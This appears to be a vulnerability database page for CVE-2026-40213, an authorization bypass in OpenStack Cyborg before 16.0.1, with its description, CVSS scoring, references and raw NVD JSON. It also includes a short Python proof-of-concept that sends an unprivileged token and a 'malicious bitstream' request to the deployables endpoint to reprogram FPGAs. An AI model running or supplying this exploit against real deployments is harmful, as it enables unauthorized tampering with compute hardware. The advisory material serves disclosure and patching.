CVE-2026-40213

Description

OpenStack Cyborg before 16.0.1 uses rule:allow (check_str='@') as the default policy for multiple API endpoints. This unconditionally authorizes any request carrying a valid Keystone token regardless of roles, project membership, or scope. An authenticated user with zero role assignments can complete various actions such as reprogramming FPGA bitstreams on arbitrary compute nodes via agent RPC.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

OpenStack Cyborg < 16.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Setup target API endpoint for FPGA reprogramming
# This endpoint is vulnerable in versions < 16.0.1
target_url = "http://cyborg-api-service:6666/v2/deployables"

# A valid Keystone token obtained by a low-privileged user
# The user has NO roles assigned, but the token is valid
auth_token = "gAAAAABk..."

headers = {
    "X-Auth-Token": auth_token,
    "Content-Type": "application/json"
}

# Malicious payload to reprogram FPGA bitstream
# This action normally requires admin privileges
payload = {
    "name": "exploit_fpga_reprogram",
    "image_uuid": "malicious-bitstream-uuid-12345"
}

try:
    # Send the request
    response = requests.post(target_url, json=payload, headers=headers)

    # Check if the request was authorized despite lack of roles
    if response.status_code == 202 or response.status_code == 200:
        print("[+] Exploit successful: FPGA reprogrammed without role checks!")
    else:
        print(f"[-] Exploit failed: Status {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40213
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40213
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40213/
[4] VulDB https://vuldb.com/cve/CVE-2026-40213
[5] https://bugs.launchpad.net/openstack-cyborg/+bug/2143263
[6] https://security.openstack.org/ossa/OSSA-2026-011.html
[7] https://www.openwall.com/lists/oss-security/2026/05/07/6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40213", "sourceIdentifier": "[email protected]", "published": "2026-05-07T22:16:34.910", "lastModified": "2026-05-08T16:16:10.770", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenStack Cyborg before 16.0.1 uses rule:allow (check_str='@') as the default policy for multiple API endpoints. This unconditionally authorizes any request carrying a valid Keystone token regardless of roles, project membership, or scope. An authenticated user with zero role assignments can complete various actions such as reprogramming FPGA bitstreams on arbitrary compute nodes via agent RPC."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://bugs.launchpad.net/openstack-cyborg/+bug/2143263", "source": "[email protected]"}, {"url": "https://security.openstack.org/ossa/OSSA-2026-011.html", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/07/6", "source": "[email protected]"}]}}